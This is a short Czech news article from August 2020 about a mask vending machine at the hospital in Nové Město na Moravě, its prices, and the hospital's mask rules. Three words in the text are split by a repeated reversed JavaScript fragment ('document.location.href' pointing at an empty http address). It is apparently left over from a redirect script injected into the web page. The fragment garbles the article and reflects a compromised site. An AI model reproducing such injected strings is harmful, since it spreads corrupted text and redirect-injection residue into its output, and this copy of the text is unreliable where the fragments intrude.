Rainbow page separator

Mimo nemocniční lékárnu jsou roušky k dostání i v rouškomatu

Neděle, 30. srpna 2020

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Využít takzvaný rouškomat umístěný v recepci chirurgického pavilonu novoměstské nemocnice mohou pacienti i návštěvníci zdravotnického zařízení, kteří si s sebou do nemocnice zapomněli vzít roušku. Rouškomat mimo jednorázové ústenky a roušky s nanovlákny nabízí taktéž rukavice a kapesní dezinfekci. Ústenky jsou balené po dvou kusech, přičemž balení vyjde na čtyřicet korun, dvě roušky s nanovlákny s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí šedesát korun. Ochranné roušky jsou k dostání taktéž v nemocniční lékárně.
Povinnost mít zakrytý nos a ústa na základě mimořádného opatření ministerstva zdravotnictví v novoměstské nemocnici platí ve všech vnitřních pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách – tedy na chodbách i ve vestibulech pavilonů. Z mimořádného opatření jsou vyjmuty malé dětí do dvou let věku a osoby se sníženou rozumovou schopností. Případné sejmutí roušky se řídí pokynem zdravotníka. Pacienti, jejich doprovod i další lidé jsou před vstupem a po odchodu z nemocnice taktéž povinni si dezinfikovat ruce.